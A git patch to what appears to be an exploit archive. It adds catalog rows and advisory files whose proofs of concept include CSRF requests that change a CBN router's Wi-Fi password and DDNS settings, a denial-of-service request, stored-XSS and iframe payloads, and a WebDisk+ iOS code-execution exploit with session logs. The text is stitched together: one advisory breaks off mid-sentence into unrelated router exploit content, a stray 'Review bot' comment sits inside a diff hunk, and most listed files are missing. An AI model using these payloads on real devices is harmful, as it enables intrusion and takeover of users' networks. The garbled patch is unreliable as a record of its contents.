From 1709d70e04cfa058d0534476ccd6c4ee7aa8a777 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Wed, 29 Oct 2014 04:45:11 +0000
Subject: [PATCH] Updated 10_29_2014
---
 files.csv | 25 +++
 platforms/asp/webapps/34920.txt | 39 ++++
 platforms/hardware/remote/35068.txt | 9 +
 platforms/hardware/remote/35069.txt | 9 +
 platforms/hardware/remote/35070.txt | 9 +
 platforms/hardware/remote/35071.txt | 9 +
 platforms/hardware/webapps/35047.txt | 199 ++++++++++++++++++
 platforms/hardware/webapps/35075.txt | 118 +++++++++++
 platforms/ios/webapps/35082.txt | 223 ++++++++++++++++++++
 platforms/ios/webapps/35083.txt | 241 ++++++++++++++++++++++
 platforms/jsp/webapps/35079.txt | 53 +++++
 platforms/linux/dos/35081.txt | 61 ++++++
 platforms/multiple/remote/35062.txt | 9 +
 platforms/multiple/webapps/35076.py | 89 ++++++++
 platforms/php/webapps/34593.txt | 75 +++++++
 platforms/php/webapps/34717.txt | 31 +++
 platforms/php/webapps/34965.txt | 47 +++++
 platforms/php/webapps/35046.txt | 57 ++++++
 platforms/php/webapps/35066.txt | 9 +
 platforms/php/webapps/35067.txt | 9 +
 platforms/php/webapps/35072.txt | 37 ++++
 platforms/php/webapps/35073.txt | 67 ++++++
 platforms/php/webapps/35080.pl | 186 +++++++++++++++++
 platforms/unix/remote/35078.rb | 139 +++++++++++++
 platforms/windows/local/35074.py | 38 ++++
 platforms/windows/remote/34647.txt | 293 +++++++++++++++++++++++++++
 26 files changed, 2081 insertions(+)
 create mode 100755 platforms/asp/webapps/34920.txt
 create mode 100755 platforms/hardware/remote/35068.txt
 create mode 100755 platforms/hardware/remote/35069.txt
 create mode 100755 platforms/hardware/remote/35070.txt
 create mode 100755 platforms/hardware/remote/35071.txt
 create mode 100755 platforms/hardware/webapps/35047.txt
 create mode 100755 platforms/hardware/webapps/35075.txt
 create mode 100755 platforms/ios/webapps/35082.txt
 create mode 100755 platforms/ios/webapps/35083.txt
 create mode 100755 platforms/jsp/webapps/35079.txt
 create mode 100755 platforms/linux/dos/35081.txt
 create mode 100755 platforms/multiple/remote/35062.txt
 create mode 100755 platforms/multiple/webapps/35076.py
 create mode 100755 platforms/php/webapps/34593.txt
 create mode 100755 platforms/php/webapps/34717.txt
 create mode 100755 platforms/php/webapps/34965.txt
 create mode 100755 platforms/php/webapps/35046.txt
 create mode 100755 platforms/php/webapps/35066.txt
 create mode 100755 platforms/php/webapps/35067.txt
 create mode 100755 platforms/php/webapps/35072.txt
 create mode 100755 platforms/php/webapps/35073.txt
 create mode 100755 platforms/php/webapps/35080.pl
 create mode 100755 platforms/unix/remote/35078.rb
 create mode 100755 platforms/windows/local/35074.py
 create mode 100755 platforms/windows/remote/34647.txt
diff --git a/files.csv b/files.csv
index f66d446d6..ebf68fa5a 100755
--- a/files.csv
+++ b/files.csv
@@ -31149,6 +31149,7 @@ id,file,description,date,author,platform,type,port
 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
 34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0
 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
+34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0
 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0
@@ -31197,6 +31198,7 @@ id,file,description,date,author,platform,type,port
 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
+34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0
 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
 34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
@@ -31264,6 +31266,7 @@ id,file,description,date,author,platform,type,port
 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0
 34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
 34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
@@ -31446,6 +31449,7 @@ id,file,description,date,author,platform,type,port
 34917,platforms/multiple/webapps/34917.txt,"IBM Tivoli Access Manager for e-business ibm/wpm/webseal method Parameter XSS",2010-10-22,IBM,multiple,webapps,0
 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443
 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0
+34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Le Ngoc Son",asp,webapps,0
 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0
 34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0
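Review bot: The added 34920 row records the author as "Le Ngoc Son" and the date as 2014-10-07, while the advisory it indexes (platforms/asp/webapps/34920.txt, added later in this patch) carries `# Exploit Author: Hoang Anh Thai` and `# Date: 2014-10-10`. The author mismatch looks like a catalog error; if the column is meant to hold the advisory's author, the row should read `34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure Vulnerability",2014-10-07,"Hoang Anh Thai",asp,webapps,0`. The date column of neighbouring rows appears to be the catalog's own publication date rather than the advisory's header date, so that difference may be intentional and is worth a second look rather than a change.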
@@ -31485,6 +31489,7 @@ id,file,description,date,author,platform,type,port
 34957,platforms/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Auth Bypass Vulnerability",2014-10-14,Vulnerability-Lab,ios,webapps,0
 34958,platforms/php/webapps/34958.py,"Croogo 2.0.0 - Arbitrary PHP Code Execution Exploit",2014-10-14,LiquidWorm,php,webapps,0
 34959,platforms/php/webapps/34959.txt,"Croogo 2.0.0 - Multiple Stored XSS Vulnerabilities",2014-10-14,LiquidWorm,php,webapps,0
+34965,platforms/php/webapps/34965.txt,"Change CMS 3.6.8 - Multiple CSRF Vulnerabilities",2014-10-14,"Krusty Hack",php,webapps,0
 34966,platforms/windows/local/34966.txt,"Telefonica O2 Connection Manager 3.4 - Local Privilege Escalation Vulnerability",2014-10-14,LiquidWorm,windows,local,0
 34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0
 34968,platforms/php/webapps/34968.txt,"YourMembers Plugin - Blind SQL Injection",2014-10-14,TranDinhTien,php,webapps,0
@@ -31560,6 +31565,8 @@ id,file,description,date,author,platform,type,port
 35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0
 35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0
 35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0
+35046,platforms/php/webapps/35046.txt,"Axway Secure Transport 5.1 SP2 - Arbitary File Upload via CSRF",2014-10-23,"Emmanuel Law",php,webapps,0
+35047,platforms/hardware/webapps/35047.txt,"Dell SonicWall GMS 7.2.x - Code Injection",2014-10-23,Vulnerability-Lab,hardware,webapps,0
 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -31572,6 +31579,24 @@ id,file,description,date,author,platform,type,port
 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
+35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
 35063,platforms/php/webapps/35063.txt,"Zimplit CMS zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
 35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
+35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 'pluginurl' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
+35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter Cross Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
+35068,platforms/hardware/remote/35068.txt,"pfSense pkg_edit.php id Parameter XSS",2010-11-08,"dave b",hardware,remote,0
+35069,platforms/hardware/remote/35069.txt,"pfSense pkg.php xml Parameter XSS",2010-11-08,"dave b",hardware,remote,0
+35070,platforms/hardware/remote/35070.txt,"pfSense status_graph.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0
+35071,platforms/hardware/remote/35071.txt,"pfSense interfaces.php if Parameter XSS",2010-11-08,"dave b",hardware,remote,0
+35072,platforms/php/webapps/35072.txt,"Drupal Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam Multiple Vulnerabilities",2010-12-08,"Justin Klein Keane",php,webapps,0
+35073,platforms/php/webapps/35073.txt,"Wordpress CP Multi View Event Calendar 1.01 - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80
+35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
+35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
+35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
+35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
+35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
+35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
+35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
+35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
+35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
diff --git a/platforms/asp/webapps/34920.txt b/platforms/asp/webapps/34920.txt
new file mode 100755
index 000000000..6c0004b3f
--- /dev/null
+++ b/platforms/asp/webapps/34920.txt
@@ -0,0 +1,39 @@ +# Exploit Title: HttpCombiner ASP.NET Remote File Disclosure Vulnerability +# Google Dork: [filetype:txt intext:HttpCombiner.ashx] +# Date: 2014-10-10 +# Exploit Author: Hoang Anh Thai +# Vendor Homepage: https://myfirstsamplepagebyilyasforassign.googlecode.com/files/HttpCombiner-v1.zip +# Reference: http://www.codeproject.com/KB/aspnet/HttpCombine.aspx +# Affected Versions: HttpCombiner v1.0 +# Tested on: Windows 7 / Chrome & Internet Explorer + +Description: +============ + +An HTTP handler that combines multiple CSS, Javascript or URL into one response for faster page load. It can combine, compress and cache response which results in faster page load and better scalability of web application + +It's a good practice to use many small Javascript and CSS files instead of one large Javascript/CSS file for better code maintainability, but bad in terms of website performance. Although you should write your Javascript code in small files and break large CSS files into small chunks but when browser requests those javascript and css files, it makes one Http request per file. Every Http Request results in a network roundtrip form your browser to the server and the delay in reaching the server and coming back to the browser is called latency. So, if you have four javascripts and three css files loaded by a page, you are wasting time in seven network roundtrips. Within USA, latency is average 70ms. So, you waste 7x70 = 490ms, about half a second of delay. Outside USA, average latency is around 200ms. So, that means 1400ms of waiting. Browser cannot show the page properly until Css and Javascripts are fully loaded. So, the more latency you have, the slower page loads. + +You can reduce the wait time by using a CDN. Read my previous blog post about using CDN. However, a better solution is to deliver multiple files over one request using an HttpHandler that combines several files and delivers as one output. 
So, instead of putting many + + +-- + + +Denial of Service (DoS) for all WiFi connected clients (disconnect) +################################################################### + +GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 + + +Stored Cross-Site Scripting (XSS) Vulnerability +############################################### + +Cookie: userData +Value: hax0r"> + +-- + + +; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; + + + +-- + + +Cross-Site Request Forgery (CSRF) Vulnerability +############################################### + +DDNS config: +------------ + +GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 + + +Change wifi pass: +----------------- + +GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 + + +Add static mac address (static assigned dhcp client): +----------------------------------------------------- + +GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 + + +Enable/Disable UPnP: +-------------------- + +GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) +GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable) + diff --git a/platforms/ios/webapps/35082.txt b/platforms/ios/webapps/35082.txt new file mode 100755 index 000000000..cc7df2e38 --- /dev/null +++ b/platforms/ios/webapps/35082.txt 
@@ -0,0 +1,223 @@ +Document Title: +=============== +WebDisk+ v2.1 iOS - Code Execution Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1349 + + +Release Date: +============= +2014-10-23 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1349 + + +Common Vulnerability Scoring System: +==================================== +9.1 + + +Product & Service Introduction: +=============================== +WebDisk+ is a Push verion of WebDisk. It have all Full functionality of WebDisk .lets your iphone/ipad become a file website over +wi-fi netwrk.You can upload/download your document to your iphone/ipad on your pc browser over wi-fi. And it is also a document +viewer.let you direct view your document on your iphone/iphone. WebDisk+ can support Upload and download large files (More than 4GB) +form pc or other mobile device. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/webdisk+/id606709149 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-10-23: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +AirPhoto +Product: WebDisk+ - iOS Mobile Web Application (Wifi) 2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Critical + + +Technical Details & Description: +================================ +A code execution web vulnerability has been discovered in the official AirPhoto WebDisk+ v2.1 iOS mobile web-application. 
+The vulnerability allows remote attackers to compromise the application and connected device components by exploitation +of a system specific code execution vulnerability in the wifi interface. + +The vulnerability is located in the `name` input field of the wifi web interface upload module (afupload.ma). The function creates +the files without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method +request by usage of the `p & filename` parameters in the `afupload.ma` file to compromise the application or device. The execution of +the code occurs in the `afgetdir.ma` file of the wifi interface. The attack vector is located on the application-side of the mobile app +and the request method to inject/execute is GET. + +The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.1. +Exploitation of the code execution vulnerability requires no privileged application user account or user interaction. Successful exploitation +of the code execution vulnerability results in mobile application compromise and affected or connected device component compromise. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] Upload + +Vulnerable File(s): + [+] afupload.ma + +Vulnerable Parameter(s): + [+] p & filename + +Affected Module(s): + [+] Wifi Interface (http://localhost:1861) + + +Proof of Concept (PoC): +======================= +The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 
+ + +PoC: (URL) +http://localhost:1861/afgetdir.ma?p=\var\mobile\Containers\Data\Application\90ACE99A-5EF3-4E3E-B509-32CCDF066AA1\Documents\ + + +PoC: localhost:1861 - Web Interface Index + + +-[CODE EXECUTION VULNERABILITY VIA GET]; +10-22 13:28

+delete +
+ + + +Note: +The input field to create/upload files allows a remote attacker to execute codes directly in the web-server with multiple attack vectors. + + +--- PoC Session Logs (POST) --- +Status: 302[OK] +POST http://192.168.2.104:1861/afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[192.168.2.104:1861] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------531465230341 +Content-Disposition: form-data; name="txt" +-[CODE EXECUTION VULNERABILITY VIA GET]; +-----------------------------531465230341 +Content-Disposition: form-data; name="file"; filename="[PENG!]" +Content-Type: application/octet-stream +-----------------------------531465230341 +Content-Disposition: form-data; name="sub" +upload +-----------------------------531465230341--] + Response Header: + Location[afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C] + Content-Length[0] + Server[MHttpServer/1.0.0] Status: 200[OK] +GET http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C +Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3051] Mime Type[text/html] + Request Header: + Host[192.168.2.104:1861] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + 
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C] + Connection[keep-alive] + Response Header: + Content-Type[text/html] + Content-Length[3051] + Server[MHttpServer/1.0.0] + + +Reference(s): +afgetdir.ma +afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C +afupload.ma +afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C + + +Solution - Fix & Patch: +======================= +To patch the vulnerability it is required to parse and encode the upload GET method request. +Restrict the input field of the p & filename value to prevent code execution in the main wifi interface. + + +Security Risk: +============== +The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 9.1) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + +COMPANY: Evolution Security GmbH +BUSINESS: www.evolution-sec.com + + diff --git a/platforms/ios/webapps/35083.txt b/platforms/ios/webapps/35083.txt new file mode 100755 index 000000000..467b0197d --- /dev/null +++ b/platforms/ios/webapps/35083.txt 
@@ -0,0 +1,241 @@ +Document Title: +=============== +Folder Plus v2.5.1 iOS - Persistent Item Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1348 + + +Release Date: +============= +2014-10-24 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1348 + + +Common Vulnerability Scoring System: +==================================== +3.5 + + +Product & Service Introduction: +=============================== +The ability to use multi touch to quickly move between viewing and editing files is also very good if you’re willing to utilize it. - Touch Reviews. +Folder Plus is an In-App Multitasking Capable File Manager/Viewer/Editor, with 3-Finger Swipes You Switch between Tasks of File Managing, Viewing, +Editing, etc QUICKLY. + +(Copy of the Vendor Homepage: http://theverygames.com/folder-plus/ & https://itunes.apple.com/us/app/file-manager-folder-plus/id484856077 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official The Very Games `Folder Plus` iOS mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2014-10-24: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +The Very Games +Product: Folder Plus - iOS Mobile Web Application (Wifi) 2.5.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in the official Folder Plus v2.5.1 iOS mobile application. +The issue allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module. 
+ +The vulnerability is located in the delete item message context of the wifi interface listing module. The issue allows remote attackers +to inject own persistent script codes by usage of the vulnerable create folder function. The attacker injects a script code payloads and +waits for a higher privileged delete of the item to execute the script codes. The execution of the injected script code occurs in the +delete message context to confirm to erase. The attack vector is persistent on the application-side and the request method to execute +is GET. The issue allows to stream persistent malicious script codes to the front site wifi root path. + +The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5. +Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction. +Successful exploitation of the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious +sources and application-side manipulation of affected or connected module context. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] Wifi Sharing + +Vulnerable Function(s): + [+] Delete Item + +Vulnerable Parameter(s): + [+] items name + +Affected Module(s): + [+] Wifi Interface - Root Index + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with +low or medium user interaction. For security demonstration or to reproduce the issue follow the provided information and steps below to continue. + +PoC: Folder Plus > THE VERY GAMES - Wifi UI Index + +????? + + +Delete
"><[PERSISTENT INJECTED SCRIPT CODE!]);">
?????? + + + + +
Cancel
+ +
Delete
+ + + + + + + + + + + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[2] + Vary[Accept] + Content-Type[application/json] + Date[Tue, 21 Oct 2014 15:42:33 GMT] + +Status: 200[OK] +GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[491] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[491] + Vary[Accept] + Content-Type[application/json] + Date[Tue, 21 Oct 2014 15:42:34 GMT] + +Status: 200[OK] +GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] 
